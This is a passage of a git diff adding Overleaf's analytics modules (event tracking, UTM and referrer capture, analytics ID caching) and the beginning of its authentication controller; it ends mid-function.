b/services/web/app/src/Features/Analytics/AnalyticsController.mjs new file mode 100644 index 0000000..7d9188f --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsController.mjs @@ -0,0 +1,65 @@ +import metrics from '@overleaf/metrics' +import AnalyticsManager from './AnalyticsManager.js' +import SessionManager from '../Authentication/SessionManager.js' +import GeoIpLookup from '../../infrastructure/GeoIpLookup.js' +import Features from '../../infrastructure/Features.js' +import { expressify } from '@overleaf/promise-utils' +import AccountMappingHelper from './AccountMappingHelper.js' + +async function registerSalesforceMapping(req, res, next) { + if (!Features.hasFeature('analytics')) { + return res.sendStatus(202) + } + const { createdAt, salesforceId, v1Id } = req.body + AnalyticsManager.registerAccountMapping( + AccountMappingHelper.generateV1Mapping(v1Id, salesforceId, createdAt) + ) + res.sendStatus(202) +} + +async function updateEditingSession(req, res, next) { + if (!Features.hasFeature('analytics')) { + return res.sendStatus(202) + } + const userId = SessionManager.getLoggedInUserId(req.session) + const { projectId } = req.params + const segmentation = req.body.segmentation || {} + let countryCode = null + + if (userId) { + try { + const geoDetails = await GeoIpLookup.promises.getDetails(req.ip) + if (geoDetails && geoDetails.country_code) { + countryCode = geoDetails.country_code + } + AnalyticsManager.updateEditingSession( + userId, + projectId, + countryCode, + segmentation + ) + } catch (error) { + metrics.inc('analytics_geo_ip_lookup_errors') + } + } + res.sendStatus(202) +} + +function recordEvent(req, res, next) { + if (!Features.hasFeature('analytics')) { + return res.sendStatus(202) + } + delete req.body._csrf + AnalyticsManager.recordEventForSession( + req.session, + req.params.event, + req.body + ) + res.sendStatus(202) +} + +export default { + registerSalesforceMapping: expressify(registerSalesforceMapping), + updateEditingSession: expressify(updateEditingSession), + recordEvent, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsManager.js b/services/web/app/src/Features/Analytics/AnalyticsManager.js new file mode 100644 index 0000000..4afdb08 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsManager.js @@ -0,0 +1,404 @@ +const SessionManager = require('../Authentication/SessionManager') +const UserAnalyticsIdCache = require('./UserAnalyticsIdCache') +const Settings = require('@overleaf/settings') +const Metrics = require('../../infrastructure/Metrics') +const Queues = require('../../infrastructure/Queues') +const crypto = require('crypto') +const _ = require('lodash') +const { expressify } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') + +const analyticsEventsQueue = Queues.getQueue('analytics-events') +const analyticsEditingSessionsQueue = Queues.getQueue( + 'analytics-editing-sessions' +) +const analyticsUserPropertiesQueue = Queues.getQueue( + 'analytics-user-properties' +) +const analyticsAccountMappingQueue = Queues.getQueue( + 'analytics-account-mapping' +) + +const ONE_MINUTE_MS = 60 * 1000 + +const UUID_REGEXP = /^[\w]{8}(-[\w]{4}){3}-[\w]{12}$/ + +function identifyUser(userId, analyticsId, isNewUser) { + if (!userId || !analyticsId || !analyticsId.toString().match(UUID_REGEXP)) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + Metrics.analyticsQueue.inc({ status: 'adding', event_type: 'identify' }) + Queues.createScheduledJob( + 'analytics-events', + { + name: 'identify', + data: { userId, analyticsId, isNewUser, createdAt: new Date() }, + }, + ONE_MINUTE_MS + ) + .then(() => { + Metrics.analyticsQueue.inc({ status: 'added', event_type: 'identify' }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ status: 'error', event_type: 'identify' }) + }) +} + +async function recordEventForUser(userId, event, segmentation) { + if (!userId) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + const analyticsId = await UserAnalyticsIdCache.get(userId) + if (analyticsId) { + _recordEvent({ analyticsId, userId, event, segmentation, isLoggedIn: true }) + } +} + +function recordEventForUserInBackground(userId, event, segmentation) { + recordEventForUser(userId, event, segmentation).catch(err => { + logger.warn( + { err, userId, event, segmentation }, + 'failed to record event for user' + ) + }) +} + +function recordEventForSession(session, event, segmentation) { + const { analyticsId, userId } = getIdsFromSession(session) + if (!analyticsId) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + _recordEvent({ + analyticsId, + userId, + event, + segmentation, + isLoggedIn: !!userId, + createdAt: new Date(), + }) +} + +async function setUserPropertyForUser(userId, propertyName, propertyValue) { + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + + _checkPropertyValue(propertyValue) + + const analyticsId = await UserAnalyticsIdCache.get(userId) + if (analyticsId) { + await _setUserProperty({ analyticsId, propertyName, propertyValue }) + } +} + +function setUserPropertyForUserInBackground(userId, property, value) { + setUserPropertyForUser(userId, property, value).catch(err => { + logger.warn( + { err, userId, property, value }, + 'failed to set user property for user' + ) + }) +} + +async function setUserPropertyForAnalyticsId( + analyticsId, + propertyName, + propertyValue +) { + if (_isAnalyticsDisabled()) { + return + } + + _checkPropertyValue(propertyValue) + + await _setUserProperty({ analyticsId, propertyName, propertyValue }) +} + +async function setUserPropertyForSession(session, propertyName, propertyValue) { + const { analyticsId, userId } = getIdsFromSession(session) + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + + _checkPropertyValue(propertyValue) + + if (analyticsId) { + await _setUserProperty({ analyticsId, propertyName, propertyValue }) + } +} + +function setUserPropertyForSessionInBackground(session, property, value) { + setUserPropertyForSession(session, property, value).catch(err => { + const { analyticsId, userId } = getIdsFromSession(session) + logger.warn( + { err, analyticsId, userId, property, value }, + 'failed to set user property for session' + ) + }) +} + +/** + * @typedef {(import('./types').AccountMapping)} AccountMapping + */ + +/** + * Register mapping between two accounts. + * + * @param {AccountMapping} payload - The event payload to send to Analytics + */ +function registerAccountMapping({ + source, + sourceEntity, + sourceEntityId, + target, + targetEntity, + targetEntityId, + createdAt, +}) { + Metrics.analyticsQueue.inc({ + status: 'adding', + event_type: 'account-mapping', + }) + + analyticsAccountMappingQueue + .add('account-mapping', { + source, + sourceEntity, + sourceEntityId, + target, + targetEntity, + targetEntityId, + createdAt: createdAt ?? new Date(), + }) + .then(() => { + Metrics.analyticsQueue.inc({ + status: 'added', + event_type: 'account-mapping', + }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ + status: 'error', + event_type: 'account-mapping', + }) + }) +} + +function updateEditingSession(userId, projectId, countryCode, segmentation) { + if (!userId) { + return + } + if (_isAnalyticsDisabled() || _isSmokeTestUser(userId)) { + return + } + if (!_isSegmentationValid(segmentation)) { + logger.info( + { userId, projectId, segmentation }, + 'rejecting analytics editing session due to bad segmentation' + ) + return + } + Metrics.analyticsQueue.inc({ + status: 'adding', + event_type: 'editing-session', + }) + analyticsEditingSessionsQueue + .add('editing-session', { + userId, + projectId, + countryCode, + segmentation, + createdAt: new Date(), + }) + .then(() => { + Metrics.analyticsQueue.inc({ + status: 'added', + event_type: 'editing-session', + }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ + status: 'error', + event_type: 'editing-session', + }) + }) +} + +function _recordEvent( + { analyticsId, userId, event, segmentation, isLoggedIn }, + { delay } = {} +) { + if (!_isAttributeValid(event)) { + logger.info( + { analyticsId, event, segmentation }, + 'rejecting analytics event due to bad event name' + ) + return + } + if (!_isSegmentationValid(segmentation)) { + logger.info( + { analyticsId, event, segmentation }, + 'rejecting analytics event due to bad segmentation' + ) + return + } + logger.debug( + { + analyticsId, + userId, + event, + segmentation, + isLoggedIn: !!userId, + createdAt: new Date(), + }, + 'queueing analytics event' + ) + Metrics.analyticsQueue.inc({ status: 'adding', event_type: 'event' }) + analyticsEventsQueue + .add( + 'event', + { + analyticsId, + userId, + event, + segmentation, + isLoggedIn, + createdAt: new Date(), + }, + { delay } + ) + .then(() => { + Metrics.analyticsQueue.inc({ status: 'added', event_type: 'event' }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ status: 'error', event_type: 'event' }) + }) +} + +async function _setUserProperty({ analyticsId, propertyName, propertyValue }) { + if (!_isAttributeValid(propertyName)) { + logger.info( + { analyticsId, propertyName, propertyValue }, + 'rejecting analytics user property due to bad name' + ) + return + } + if (!_isAttributeValueValid(propertyValue)) { + logger.info( + { analyticsId, propertyName, propertyValue }, + 'rejecting analytics user property due to bad value' + ) + return + } + Metrics.analyticsQueue.inc({ + status: 'adding', + event_type: 'user-property', + }) + await analyticsUserPropertiesQueue + .add('user-property', { + analyticsId, + propertyName, + propertyValue, + createdAt: new Date(), + }) + .then(() => { + Metrics.analyticsQueue.inc({ + status: 'added', + event_type: 'user-property', + }) + }) + .catch(() => { + Metrics.analyticsQueue.inc({ + status: 'error', + event_type: 'user-property', + }) + }) +} + +function _isSmokeTestUser(userId) { + const smokeTestUserId = Settings.smokeTest && Settings.smokeTest.userId + return ( + smokeTestUserId != null && + userId != null && + userId.toString() === smokeTestUserId + ) +} + +function _isAnalyticsDisabled() { + return !(Settings.analytics && Settings.analytics.enabled) +} + +function _checkPropertyValue(propertyValue) { + if (propertyValue === undefined) { + throw new Error( + 'propertyValue cannot be undefined, use null to unset a property' + ) + } +} + +function _isAttributeValid(attribute) { + return !attribute || /^[a-zA-Z0-9-_.:;,/]+$/.test(attribute) +} + +function _isAttributeValueValid(attributeValue) { + return _isAttributeValid(attributeValue) || attributeValue instanceof Date +} + +function _isSegmentationValid(segmentation) { + if (segmentation) { + for (const key of Object.keys(segmentation)) { + if (!_isAttributeValid(key)) { + return false + } + } + } + + return true +} + +function getIdsFromSession(session) { + const analyticsId = _.get(session, ['analyticsId']) + const userId = SessionManager.getLoggedInUserId(session) + return { analyticsId, userId } +} + +async function analyticsIdMiddleware(req, res, next) { + const session = req.session + const sessionUser = SessionManager.getSessionUser(session) + + if (sessionUser) { + session.analyticsId = await UserAnalyticsIdCache.get(sessionUser._id) + } else if (!session.analyticsId) { + // generate an `analyticsId` if needed + session.analyticsId = crypto.randomUUID() + } + + res.locals.getSessionAnalyticsId = () => session.analyticsId + + next() +} + +module.exports = { + identifyUser, + recordEventForSession, + recordEventForUser, + recordEventForUserInBackground, + setUserPropertyForUser, + setUserPropertyForUserInBackground, + setUserPropertyForSession, + setUserPropertyForSessionInBackground, + setUserPropertyForAnalyticsId, + updateEditingSession, + getIdsFromSession, + registerAccountMapping, + analyticsIdMiddleware: expressify(analyticsIdMiddleware), +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsProxy.mjs b/services/web/app/src/Features/Analytics/AnalyticsProxy.mjs new file mode 100644 index 0000000..e7296ad --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsProxy.mjs @@ -0,0 +1,28 @@ +import settings from '@overleaf/settings' +import Errors from '../Errors/Errors.js' +import httpProxy from 'express-http-proxy' + +export default { + call(basePath) { + if (!settings.apis.analytics) { + return (req, res, next) => + next( + new Errors.ServiceNotConfiguredError( + 'Analytics service not configured' + ) + ) + } + + return httpProxy(settings.apis.analytics.url, { + proxyReqPathResolver(req) { + // req.url is the part of the path that comes after the mount point in + // app.use() + return `${basePath}${req.url}` + }, + proxyReqOptDecorator(proxyReqOpts, srcReq) { + proxyReqOpts.headers = {} // unset all headers + return proxyReqOpts + }, + }) + }, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceHelper.js b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceHelper.js new file mode 100644 index 0000000..6166f08 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceHelper.js @@ -0,0 +1,96 @@ +const AnalyticsManager = require('./AnalyticsManager') +const RequestHelper = require('./RequestHelper') + +function clearSource(session) { + if (session) { + delete session.required_login_from_product_medium + delete session.required_login_from_product_source + } +} + +function setInbound(session, url, query, referrer) { + const inboundSession = { + referrer: RequestHelper.parseReferrer(referrer, url), + utm: RequestHelper.parseUtm(query), + } + + if (inboundSession.referrer || inboundSession.utm) { + session.inbound = inboundSession + } +} + +function clearInbound(session) { + if (session) { + delete session.inbound + } +} + +function addUserProperties(userId, session) { + if (!session) { + return + } + + if (session.required_login_from_product_medium) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-product-medium`, + session.required_login_from_product_medium + ) + if (session.required_login_from_product_source) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-product-source`, + session.required_login_from_product_source + ) + } + } else if (session.referal_id) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-bonus-scheme`, + true + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-product-medium`, + 'bonus-scheme' + ) + } + + if (session.inbound) { + if (session.inbound.referrer && session.inbound.referrer.medium) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-referrer-medium`, + `${session.inbound.referrer.medium + .charAt(0) + .toUpperCase()}${session.inbound.referrer.medium.slice(1)}` + ) + if (session.inbound.referrer.source) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-referrer-source`, + session.inbound.referrer.source + ) + } + } + + if (session.inbound.utm) { + for (const utmKey of RequestHelper.UTM_KEYS) { + if (session.inbound.utm[utmKey]) { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + `registered-from-${utmKey.replace('_', '-')}`, + session.inbound.utm[utmKey] + ) + } + } + } + } +} + +module.exports = { + clearSource, + setInbound, + clearInbound, + addUserProperties, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceMiddleware.js b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceMiddleware.js new file mode 100644 index 0000000..733d636 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsRegistrationSourceMiddleware.js @@ -0,0 +1,58 @@ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const AnalyticsRegistrationSourceHelper = require('./AnalyticsRegistrationSourceHelper') +const SessionManager = require('../../Features/Authentication/SessionManager') + +function setSource(medium, source) { + return function (req, res, next) { + if (req.session) { + req.session.required_login_from_product_medium = medium + if (source) { + req.session.required_login_from_product_source = source + } + } + next() + } +} + +function clearSource() { + return function (req, res, next) { + AnalyticsRegistrationSourceHelper.clearSource(req.session) + next() + } +} + +function setInbound() { + return function setInbound(req, res, next) { + if (req.session.inbound) { + return next() // don't overwrite referrer + } + + if (SessionManager.isUserLoggedIn(req.session)) { + return next() // don't store referrer if user is already logged in + } + + const referrer = req.header('referrer') + try { + AnalyticsRegistrationSourceHelper.setInbound( + req.session, + req.url, + req.query, + referrer + ) + } catch (error) { + // log errors and fail silently + OError.tag(error, 'failed to parse inbound referrer', { + referrer, + }) + logger.warn({ error }, error.message) + } + next() + } +} + +module.exports = { + setSource, + clearSource, + setInbound, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsRouter.mjs b/services/web/app/src/Features/Analytics/AnalyticsRouter.mjs new file mode 100644 index 0000000..933d4b0 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsRouter.mjs @@ -0,0 +1,51 @@ +import AuthenticationController from './../Authentication/AuthenticationController.js' +import AnalyticsController from './AnalyticsController.mjs' +import AnalyticsProxy from './AnalyticsProxy.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' + +const rateLimiters = { + recordEvent: new RateLimiter('analytics-record-event', { + points: 200, + duration: 60, + }), + updateEditingSession: new RateLimiter('analytics-update-editing-session', { + points: 20, + duration: 60, + }), + uniExternalCollabProxy: new RateLimiter( + 'analytics-uni-external-collab-proxy', + { points: 20, duration: 60 } + ), +} + +export default { + apply(webRouter, privateApiRouter, publicApiRouter) { + webRouter.post( + '/event/:event([a-z0-9-_]+)', + RateLimiterMiddleware.rateLimit(rateLimiters.recordEvent), + AnalyticsController.recordEvent + ) + + webRouter.put( + '/editingSession/:projectId', + RateLimiterMiddleware.rateLimit(rateLimiters.updateEditingSession, { + params: ['projectId'], + }), + AnalyticsController.updateEditingSession + ) + + publicApiRouter.use( + '/analytics/uniExternalCollaboration', + AuthenticationController.requirePrivateApiAuth(), + RateLimiterMiddleware.rateLimit(rateLimiters.uniExternalCollabProxy), + AnalyticsProxy.call('/uniExternalCollaboration') + ) + + publicApiRouter.post( + '/analytics/register-v-1-salesforce-mapping', + AuthenticationController.requirePrivateApiAuth(), + AnalyticsController.registerSalesforceMapping + ) + }, +} diff --git a/services/web/app/src/Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs b/services/web/app/src/Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs new file mode 100644 index 0000000..d2f1f70 --- /dev/null +++ b/services/web/app/src/Features/Analytics/AnalyticsUTMTrackingMiddleware.mjs @@ -0,0 +1,58 @@ +import _ from 'lodash' +import RequestHelper from './RequestHelper.js' +import AnalyticsManager from './AnalyticsManager.js' +import querystring from 'node:querystring' +import { URL } from 'node:url' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import logger from '@overleaf/logger' + +function recordUTMTags() { + return function (req, res, next) { + const query = req.query + + try { + const utmValues = RequestHelper.parseUtm(query) + + if (utmValues) { + const path = new URL(req.url, Settings.siteUrl).pathname + + AnalyticsManager.recordEventForSession(req.session, 'page-view', { + path, + ...utmValues, + }) + + const propertyValue = `${utmValues.utm_source || 'N/A'};${ + utmValues.utm_medium || 'N/A' + };${utmValues.utm_campaign || 'N/A'};${ + utmValues.utm_content || utmValues.utm_term || 'N/A' + }` + AnalyticsManager.setUserPropertyForSessionInBackground( + req.session, + 'utm-tags', + propertyValue + ) + + // redirect to URL without UTM query params + const queryWithoutUtm = _.omit(query, RequestHelper.UTM_KEYS) + const queryString = + Object.keys(queryWithoutUtm).length > 0 + ? '?' + querystring.stringify(queryWithoutUtm) + : '' + return res.redirect(path + queryString) + } + } catch (error) { + // log errors and fail silently + OError.tag(error, 'failed to track UTM tags', { + query, + }) + logger.warn({ error }, error.message) + } + + next() + } +} + +export default { + recordUTMTags, +} diff --git a/services/web/app/src/Features/Analytics/RequestHelper.js b/services/web/app/src/Features/Analytics/RequestHelper.js new file mode 100644 index 0000000..08a6566 --- /dev/null +++ b/services/web/app/src/Features/Analytics/RequestHelper.js @@ -0,0 +1,56 @@ +const RefererParser = require('referer-parser') +const { URL } = require('url') + +const UTM_KEYS = [ + 'utm_campaign', + 'utm_source', + 'utm_term', + 'utm_content', + 'utm_medium', + 'utm_count', +] + +function parseUtm(query) { + const utmValues = {} + for (const utmKey of UTM_KEYS) { + if (query[utmKey]) { + utmValues[utmKey] = query[utmKey] + } + } + return Object.keys(utmValues).length > 0 ? utmValues : null +} + +function parseReferrer(referrer, url) { + if (!referrer) { + return { + medium: 'direct', + } + } + + const parsedReferrer = new RefererParser(referrer, url) + + const referrerValues = { + medium: parsedReferrer.medium, + source: parsedReferrer.referer || 'other', + } + + if (referrerValues.medium === 'unknown') { + try { + const referrerHostname = new URL(referrer).hostname + if (referrerHostname) { + referrerValues.medium = 'link' + referrerValues.source = referrerHostname + } + } catch (error) { + // ignore referrer parsing errors + } + } + + return referrerValues +} + +module.exports = { + UTM_KEYS, + parseUtm, + parseReferrer, +} diff --git a/services/web/app/src/Features/Analytics/UserAnalyticsIdCache.js b/services/web/app/src/Features/Analytics/UserAnalyticsIdCache.js new file mode 100644 index 0000000..97b4e80 --- /dev/null +++ b/services/web/app/src/Features/Analytics/UserAnalyticsIdCache.js @@ -0,0 +1,31 @@ +const UserGetter = require('../User/UserGetter') +const { CacheLoader } = require('cache-flow') +const { callbackify } = require('util') + +class UserAnalyticsIdCache extends CacheLoader { + constructor() { + super('user-analytics-id', { + expirationTime: 60, + maxSize: 10000, + }) + } + + async load(userId) { + const user = await UserGetter.promises.getUser(userId, { analyticsId: 1 }) + if (user) { + return user.analyticsId || user._id.toString() + } + } + + keyToString(userId) { + if (userId) { + return userId.toString() + } + } +} + +const userAnalyticsIdCache = new UserAnalyticsIdCache() +userAnalyticsIdCache.callbacks = { + get: callbackify(userAnalyticsIdCache.get).bind(userAnalyticsIdCache), +} +module.exports = userAnalyticsIdCache diff --git a/services/web/app/src/Features/Analytics/types.d.ts b/services/web/app/src/Features/Analytics/types.d.ts new file mode 100644 index 0000000..44df848 --- /dev/null +++ b/services/web/app/src/Features/Analytics/types.d.ts @@ -0,0 +1,9 @@ +export type AccountMapping = { + source: string + sourceEntity: string + sourceEntityId: string + target: string + targetEntity: string + targetEntityId: string + createdAt: string +} diff --git a/services/web/app/src/Features/Authentication/AuthenticationController.js b/services/web/app/src/Features/Authentication/AuthenticationController.js new file mode 100644 index 0000000..7a97d2a --- /dev/null +++ b/services/web/app/src/Features/Authentication/AuthenticationController.js @@ -0,0 +1,671 @@ +const AuthenticationManager = require('./AuthenticationManager') +const SessionManager = require('./SessionManager') +const OError = require('@overleaf/o-error') +const LoginRateLimiter = require('../Security/LoginRateLimiter') +const UserUpdater = require('../User/UserUpdater') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const querystring = require('querystring') +const Settings = require('@overleaf/settings') +const basicAuth = require('basic-auth') +const tsscmp = require('tsscmp') +const UserHandler = require('../User/UserHandler') +const UserSessionsManager = require('../User/UserSessionsManager') +const Analytics = require('../Analytics/AnalyticsManager') +const passport = require('passport') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const UrlHelper = require('../Helpers/UrlHelper') +const AsyncFormHelper = require('../Helpers/AsyncFormHelper') +const _ = require('lodash') +const UserAuditLogHandler = require('../User/UserAuditLogHandler') +const AnalyticsRegistrationSourceHelper = require('../Analytics/AnalyticsRegistrationSourceHelper') +const { + acceptsJson, +} = require('../../infrastructure/RequestContentTypeDetection') +const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') +const Modules = require('../../infrastructure/Modules') +const { expressify, promisify } = require('@overleaf/promise-utils') +const { handleAuthenticateErrors } = require('./AuthenticationErrors') +const EmailHelper = require('../Helpers/EmailHelper') + +function send401WithChallenge(res) { + res.setHeader('WWW-Authenticate', 'OverleafLogin') + res.sendStatus(401) +} + +function checkCredentials(userDetailsMap, user, password) { + const expectedPassword = userDetailsMap.get(user) + const userExists = userDetailsMap.has(user) && expectedPassword // user exists with a non-null password + const isValid = userExists && tsscmp(expectedPassword, password) + if (!isValid) { + logger.err({ user }, 'invalid login details') + } + Metrics.inc('security.http-auth.check-credentials', 1, { + path: userExists ? 'known-user' : 'unknown-user', + status: isValid ? 'pass' : 'fail', + }) + return isValid +} + +function reduceStaffAccess(staffAccess) { + const reducedStaffAccess = {} + for (const field in staffAccess) { + if (staffAccess[field]) { + reducedStaffAccess[field] = true + } + } + return reducedStaffAccess +} + +function userHasStaffAccess(user) { + return user.staffAccess && Object.values(user.staffAccess).includes(true) +} + +// TODO: Finish making these methods async +const AuthenticationController = { + serializeUser(user, callback) { + if (!user._id || !user.email) { + const err = new Error('serializeUser called with non-user object') + logger.warn({ user }, err.message) + return callback(err) + } + const lightUser = { + _id: user._id, + first_name: user.first_name, + last_name: user.last_name, + email: user.email, + referal_id: user.referal_id, + session_created: new Date().toISOString(), + ip_address: user._login_req_ip, + must_reconfirm: user.must_reconfirm, + v1_id: user.overleaf != null ? user.overleaf.id : undefined, + analyticsId: user.analyticsId || user._id, + alphaProgram: user.alphaProgram || undefined, // only store if set + betaProgram: user.betaProgram || undefined, // only store if set + } + if (user.isAdmin) { + lightUser.isAdmin = true + } + if (userHasStaffAccess(user)) { + lightUser.staffAccess = reduceStaffAccess(user.staffAccess) + } + + callback(null, lightUser) + }, + + deserializeUser(user, cb) { + cb(null, user) + }, + + passportLogin(req, res, next) { + // This function is middleware which wraps the passport.authenticate middleware, + // so we can send back our custom `{message: {text: "", type: ""}}` responses on failure, + // and send a `{redir: ""}` response on success + passport.authenticate( + 'local', + { keepSessionInfo: true }, + async function (err, user, info) { + if (err) { + return next(err) + } + if (user) { + // `user` is either a user object or false + AuthenticationController.setAuditInfo(req, { + method: 'Password login', + }) + + try { + // We could investigate whether this can be done together with 'preFinishLogin' instead of being its own hook + await Modules.promises.hooks.fire( + 'saasLogin', + { email: user.email }, + req + ) + await AuthenticationController.promises.finishLogin(user, req, res) + } catch (err) { + return next(err) + } + } else { + if (info.redir != null) { + return res.json({ redir: info.redir }) + } else { + res.status(info.status || 200) + delete info.status + const body = { message: info } + const { errorReason } = info + if (errorReason) { + body.errorReason = errorReason + delete info.errorReason + } + return res.json(body) + } + } + } + )(req, res, next) + }, + + async _finishLoginAsync(user, req, res) { + if (user === false) { + return AsyncFormHelper.redirect(req, res, '/login') + } // OAuth2 'state' mismatch + + if (user.suspended) { + return AsyncFormHelper.redirect(req, res, '/account-suspended') + } + + if (Settings.adminOnlyLogin && !hasAdminAccess(user)) { + return res.status(403).json({ + message: { type: 'error', text: 'Admin only panel' }, + }) + } + + const auditInfo = AuthenticationController.getAuditInfo(req) + + const anonymousAnalyticsId = req.session.analyticsId + const isNewUser = req.session.justRegistered || false + + const results = await Modules.promises.hooks.fire( + 'preFinishLogin', + req, + res, + user + ) + + if (results.some(result => result && result.doNotFinish)) { + return + } + + if (user.must_reconfirm) { + return AuthenticationController._redirectToReconfirmPage(req, res, user) + } + + const redir = + AuthenticationController.getRedirectFromSession(req) || '/project' + + _loginAsyncHandlers(req, user, anonymousAnalyticsId, isNewUser) + const userId = user._id + + await UserAuditLogHandler.promises.addEntry( + userId, + 'login', + userId, + req.ip, + auditInfo + ) + + await _afterLoginSessionSetupAsync(req, user) + + AuthenticationController._clearRedirectFromSession(req) + AnalyticsRegistrationSourceHelper.clearSource(req.session) + AnalyticsRegistrationSourceHelper.clearInbound(req.session) + AsyncFormHelper.redirect(req, res, redir) + }, + + finishLogin(user, req, res, next) { + AuthenticationController._finishLoginAsync(user, req, res).catch(err => + next(err) + ) + }, + + async doPassportLogin(req, username, password, done) { + let user, info + try { + ;({ user, info } = await AuthenticationController._doPassportLogin( + req, + username, + password + )) + } catch (error) { + return done(error) + } + return done(undefined, user, info) + }, + + /** + * + * @param req + * @param username + * @param password + * @returns {Promise<{ user: any, info: any}>} + */ + async _doPassportLogin(req, username, password) { + const email = EmailHelper.parseEmail(username) + if (!email) { + Metrics.inc('login_failure_reason', 1, { status: 'invalid_email' }) + return { + user: null, + info: { + status: 400, + type: 'error', + text: req.i18n.translate('email_address_is_invalid'), + }, + } + } + AuthenticationController.setAuditInfo(req, { method: 'Password login' }) + + const { fromKnownDevice } = AuthenticationController.getAuditInfo(req) + const auditLog = { + ipAddress: req.ip, + info: { method: 'Password login', fromKnownDevice }, + } + + let user, isPasswordReused + try { + ;({ user, isPasswordReused } = + await AuthenticationManager.promises.authenticate( + { email }, + password, + auditLog, + { + enforceHIBPCheck: !fromKnownDevice, + } + )) + } catch (error) { + return { + user: false, + info: handleAuthenticateErrors(error, req), + } + } + + if (user && AuthenticationController.captchaRequiredForLogin(req, user)) { + Metrics.inc('login_failure_reason', 1, { status: 'captcha_missing' }) + return { + user: false, + info: { + text: req.i18n.translate('cannot_verify_user_not_robot'), + type: 'error', + errorReason: 'cannot_verify_user_not_robot', + status: 400, + }, + } + } else if (user) { + if ( + isPasswordReused && + AuthenticationController.getRedirectFromSession(req) == null + ) { + AuthenticationController.setRedirectInSession( + req, + '/compromised-password' + ) + } + + // async actions + return { user, info: undefined } + } else { + Metrics.inc('login_failure_reason', 1, { status: 'password_invalid' }) + AuthenticationController._recordFailedLogin() + logger.debug({ email }, 'failed log in') + return { + user: false, + info: { + type: 'error', + key: 'invalid-password-retry-or-reset', + status: 401, + }, + } + } + }, + + captchaRequiredForLogin(req, user) { + switch (AuthenticationController.getAuditInfo(req).captcha) { + case 'trusted': + case 'disabled': + return false + case 'solved': + return false + case 'skipped': { + let required = false + if (user.lastFailedLogin) { + const requireCaptchaUntil = + user.lastFailedLogin.getTime() + + Settings.elevateAccountSecurityAfterFailedLogin + required = requireCaptchaUntil >= Date.now() + } + Metrics.inc('force_captcha_on_login', 1, { + status: required ? 'yes' : 'no', + }) + return required + } + default: + throw new Error('captcha middleware missing in handler chain') + } + }, + + ipMatchCheck(req, user) { + if (req.ip !== user.lastLoginIp) { + NotificationsBuilder.ipMatcherAffiliation(user._id).create( + req.ip, + () => {} + ) + } + return UserUpdater.updateUser( + user._id.toString(), + { + $set: { lastLoginIp: req.ip }, + }, + () => {} + ) + }, + + requireLogin() { + const doRequest = function (req, res, next) { + if (next == null) { + next = function () {} + } + if (!SessionManager.isUserLoggedIn(req.session)) { + if (acceptsJson(req)) return send401WithChallenge(res) + return AuthenticationController._redirectToLoginOrRegisterPage(req, res) + } else { + req.user = SessionManager.getSessionUser(req.session) + req.logger?.addFields({ userId: req.user._id }) + return next() + } + } + + return doRequest + }, + + /** + * @param {string} scope + * @return {import('express').Handler} + */ + requireOauth(scope) { + if (typeof scope !== 'string' || !scope) { + throw new Error( + "requireOauth() expects a non-empty string as 'scope' parameter" + ) + } + + // require this here because module may not be included in some versions + const Oauth2Server = require('../../../../modules/oauth2-server/app/src/Oauth2Server') + const middleware = async (req, res, next) => { + const request = new Oauth2Server.Request(req) + const response = new Oauth2Server.Response(res) + try { + const token = await Oauth2Server.server.authenticate( + request, + response, + { scope } + ) + req.oauth = { access_token: token.accessToken } + req.oauth_token = token + req.oauth_user = token.user + next() + } catch (err) { + if ( + err.code === 400 && + err.message === 'Invalid request: malformed authorization header' + ) { + err.code = 401 + } + // send all other errors + res + .status(err.code) + .json({ error: err.name, error_description: err.message }) + } + } + return expressify(middleware) + }, + + _globalLoginWhitelist: [], + addEndpointToLoginWhitelist(endpoint) { + return AuthenticationController._globalLoginWhitelist.push(endpoint) + }, + + requireGlobalLogin(req, res, next) { + if ( + AuthenticationController._globalLoginWhitelist.includes( + req._parsedUrl.pathname + ) + ) { + return next() + } + + if (req.headers.authorization != null) { + AuthenticationController.requirePrivateApiAuth()(req, res, next) + } else if (SessionManager.isUserLoggedIn(req.session)) { + next() + } else { + logger.debug( + { url: req.url }, + 'user trying to access endpoint not in global whitelist' + ) + if (acceptsJson(req)) 